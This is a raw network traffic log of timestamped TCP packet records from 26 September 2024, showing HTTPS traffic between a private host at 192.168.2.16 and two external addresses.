Sep 26, 2024 17:55:25.265686989 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.265707016 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.265810966 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.265866041 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.265877962 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.266073942 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.266098976 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.266127110 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.266143084 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.266191006 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.266412973 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.267653942 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.267724037 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.267738104 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.270442963 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.270536900 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.270556927 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.274161100 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.274230957 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.274244070 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.278027058 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.278084993 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.278098106 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.281866074 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.281919003 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.281928062 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.288921118 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.288975000 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.288985014 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.294734955 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.294791937 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.294799089 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.294867039 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.294912100 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.294918060 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.307228088 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.307271957 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.307297945 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.307315111 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.307359934 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.307410002 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.307766914 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.307820082 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.307827950 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.307838917 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.307890892 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.308288097 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.308599949 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.308653116 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.308665991 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.311480999 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.311542034 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.311556101 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.322050095 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.322073936 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.322108030 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.322124004 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.322187901 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.330965996 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.336057901 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.336077929 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.336121082 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.336137056 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.336209059 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.341206074 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.345197916 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.345222950 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.345256090 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.345272064 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.345330000 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.345484018 CEST	443	49717	142.250.184.241	192.168.2.16
Sep 26, 2024 17:55:25.345757961 CEST	49717	443	192.168.2.16	142.250.184.241
Sep 26, 2024 17:55:25.345772028 CEST	443	49717	142.250.184.241	192.168.2.16
Sep 26, 2024 17:55:25.346834898 CEST	443	49717	142.250.184.241	192.168.2.16
Sep 26, 2024 17:55:25.346900940 CEST	49717	443	192.168.2.16	142.250.184.241
Sep 26, 2024 17:55:25.346908092 CEST	443	49717	142.250.184.241	192.168.2.16
Sep 26, 2024 17:55:25.346951962 CEST	49717	443	192.168.2.16	142.250.184.241
Sep 26, 2024 17:55:25.347810984 CEST	49717	443	192.168.2.16	142.250.184.241
Sep 26, 2024 17:55:25.347875118 CEST	443	49717	142.250.184.241	192.168.2.16
Sep 26, 2024 17:55:25.347990036 CEST	49717	443	192.168.2.16	142.250.184.241
Sep 26, 2024 17:55:25.347997904 CEST	443	49717	142.250.184.241	192.168.2.16
Sep 26, 2024 17:55:25.349684954 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.352705956 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.352730036 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.352771997 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.352787018 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.352835894 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.356992960 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.357431889 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.357458115 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.357486010 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.357500076 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.357553959 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.359678030 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.359869003 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.359925985 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.359941006 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.360286951 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.360342979 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.360356092 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.362337112 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.362400055 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.362413883 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.364213943 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.364280939 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.364295959 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.366296053 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.366369963 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.366379976 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.366405964 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.366488934 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.367464066 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.368464947 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.368530035 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.368545055 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.369566917 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.369621038 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.369627953 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.370034933 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.370089054 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.370095015 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.371737003 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.371788979 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.371795893 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.372986078 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.373047113 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.373054028 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.373466015 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.373524904 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.373531103 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.376000881 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.376055002 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.376059055 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.376070976 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.376113892 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.378834963 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.378984928 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.379034996 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.379043102 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.379196882 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.379249096 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.379256964 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.379817963 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.379887104 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.379894018 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.385211945 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.385301113 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.385323048 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.385332108 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.385375023 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.385756969 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.385945082 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.385996103 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.386003971 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.396735907 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.396815062 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.396846056 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.397540092 CEST	49717	443	192.168.2.16	142.250.184.241
Sep 26, 2024 17:55:25.399976969 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.400042057 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.400052071 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.400249004 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.400299072 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.400312901 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.400404930 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.400450945 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.400456905 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.400753021 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.400805950 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.400813103 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.401213884 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.401264906 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.401273012 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.404464006 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.404536009 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.404544115 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.406928062 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.407004118 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.407011986 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.414120913 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.414191008 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.414205074 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.421876907 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.421943903 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.421952963 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.427154064 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.427217007 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.427243948 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.432337046 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.432390928 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.432413101 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.432487011 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.432539940 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.432548046 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.436182976 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.436239958 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.436248064 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.440610886 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.440673113 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.440682888 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.443792105 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.443852901 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.443864107 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.448113918 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.448255062 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.448283911 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.448299885 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.448345900 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.448390961 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.448538065 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.448582888 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.448590994 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.449748993 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.449810028 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.449817896 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.450248957 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.450810909 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.450818062 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.451215029 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.451284885 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.451292038 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.453181982 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.453243971 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.453250885 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.453398943 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.453447104 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.453454018 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.454969883 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.455034018 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.455043077 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.456984997 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.457042933 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.457050085 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.458398104 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.458452940 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.458460093 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.459273100 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.459331036 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.459331989 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.459347010 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.459399939 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.460328102 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.460719109 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.460776091 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.460783958 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.460927010 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.460961103 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.460972071 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.460980892 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.461015940 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.462800026 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.463752031 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.463785887 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.463804960 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.463814020 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.463862896 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.464106083 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.464325905 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.464376926 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.464385986 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.466614008 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.466671944 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.466679096 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.469137907 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.469199896 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.469206095 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.469372988 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.469404936 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.469419003 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.469428062 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.469460964 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.469579935 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.470668077 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.470710039 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.470730066 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.470736027 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.470773935 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.475861073 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.475944042 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.475991011 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.476001024 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.476666927 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.476703882 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.476717949 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.476726055 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.476761103 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.476839066 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.487132072 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.487185955 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.487195969 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.490464926 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.490524054 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.490530968 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.490545988 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.490586042 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.490597010 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.490655899 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.490699053 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.490708113 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.491121054 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.491156101 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.491170883 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.491178036 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.491218090 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.491250992 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.491528988 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.491583109 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.491590977 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.495332956 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.495374918 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.495400906 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.495409012 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.495449066 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.498116016 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.504847050 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.504884958 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.504897118 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.504908085 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.504955053 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.512581110 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.517807961 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.517867088 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.517875910 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.517921925 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.518002987 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.518011093 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.518188953 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.518237114 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.518243074 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.523195982 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.523251057 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.523262978 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.527247906 CEST	443	49715	172.217.16.132	192.168.2.16
